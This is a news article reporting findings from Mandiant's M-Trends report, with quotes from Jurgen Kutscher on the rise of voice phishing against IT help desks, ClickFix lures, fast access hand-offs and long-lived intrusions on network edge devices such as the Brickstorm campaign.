Voice phishing surged last year to become the second most common method used by cybercriminals to gain initial access to their victims' IT estate – and the No. 1 tactic used when breaking into cloud environments.
Groups like ShinyHunters and Scattered Lapsus$ Hunters increasingly used this and other types of interactive social engineering tactics that involve a human steering the conversation in real time in their 2025 attacks, according to Jurgen Kutscher, VP of Mandiant Consulting at Google Cloud.
"It's the interactive ones, the voice based ones, that are really creating a new challenge," he told The Register in an interview about the security shop's annual M-Trends report, based on data collected from Mandiant's more than 500,000 hours of incident response engagements conducted around the world last year.
The report found attackers used voice-based phishing as the initial infection vector in 11 percent of attacks last year, making it the second-most common method of gaining illicit access to systems. Exploiting vulnerabilities topped the charts for a sixth year, accounting for 32 percent of successful attacks.
Non-interactive lures like phishing emails, however, declined, at just six percent of 2025 intrusions.
"What we've seen in 2025 is certain threat actors calling IT help desks to, for example, register attacker-controlled devices for MFA to try and reset passwords," Kutscher said. "They're building a number of different scenarios to trick IT help desks, and an IT help desk, by default, tries to help. That's part of the reason why the social engineering attacks that are interactive are so powerful."
Don't click the 'fix'
Scammers aren't only targeting IT help desks with interactive social engineering scams, as Google – along with other security researchers – also documented a spike in ClickFix attacks over the past year as well.
ClickFix is an extremely popular social engineering tactic in which the attackers trick the users into running malicious commands on their own computers, usually by clicking a fake computer problem fix or an I-am-not-a-robot prompt.
Google's threat-intelligence arm documented "dozens" of criminals using this technique last year, and especially threat clusters focused on widespread initial access operations.
"We see the threat actors being extremely creative in these types of attacks," Kutscher said. "And they're doing this by directly establishing interactive contact with victims, which is a new level of sophistication. But the return clearly justifies the investment."
Extreme timelines
Another trend highlighted in the 102-page report involves "extremes" in the attackers' timelines, according to Kutscher.
Mandiant's investigations show an increasing number of what it calls "hand-offs," where one individual or crew gains initial access, and then they hand-off that access to a second threat group – typically a ransomware or data theft and extortion gang. Oftentimes this hand-off happens in under 30 seconds.
"And then on the other end of the spectrum, you have, this extreme level of sophistication of stealth that threat actors have gained" that allows them to remain hidden in victims' environments without being detected, sometimes for hundreds of days, Kutscher said.
Attackers on this end of the spectrum – typically espionage groups and North Korean scam IT workers – do this by targeting network edge devices like firewalls, routers, and VPNs, generally by exploiting zero-day bugs. Operators of edge devices don't often protect them with endpoint security products, so attacks running the machines often evade defenders. Miscreants can therefore stay hidden while they go about their evil business.
Kutscher calls this trend "living on the edge," and first started talking about it two years ago. "What is interesting is the evolution of how they're leveraging these edge devices," he told us.
- PRC spies Brickstormed their way into critical US networks and remained hidden for years
- Google warns China-linked spies lurking in 'numerous' enterprises
- Google catches Beijing spies using Sheets to spread espionage across 4 continents
- Google says spyware makers and China-linked groups dominated zero-day attacks last year
Miscreants are no longer just using the edge device for access into IT environments. "Now they're also leveraging the core functionalities available on these edge devices, and living on these edge devices, intercepting network traffic, being able to intercept clear-text passwords, etc," Kutscher said.
In some cases, this means the attackers don't even need to move onto the internal network because they are able to steal secrets and other sensitive data from the edge device itself.
"That is an extremely powerful persistence mechanism, and why we've seen now some threat actors with dwell times of 400 days, and the median dwell time going from 11 to 14 days," Kutscher said.
Remember Brickstorm?
Mandiant investigated "numerous" incidents in 2025 in which a suspected Chinese government spy crew tracked as UNC6201 broke into edge devices that didn't support endpoint security products, deployed a backdoor called Brickstorm to maintain long-term access, and captured valid credentials from its position on the appliance. The snoops then used these credentials to access victims' VMware environments.
They remained undetected, on average, for 393 days.
These scenarios challenge network infosec teams. The exceedingly short hand-off time from initial access to ransomware infections, for example, means defenders must "operate at machine speed," Kutscher said. "When an attack life cycle takes place in seconds, human speed is probably not going to be sufficient to stop these types of attacks."
Of course, Google, a security and AI vendor, has a whole suite of products it would like to sell you to help with that.
"You also have to realize that a low-impact incident may turn into a high-impact incident within seconds," Kutscher said. "From an investigative perspective, you can no longer just classify something as low-impact and dismiss it for later. You have to look at all of these events and understand what could be a stage-one attack and could lead to a potential catastrophic consequence for the enterprise." ®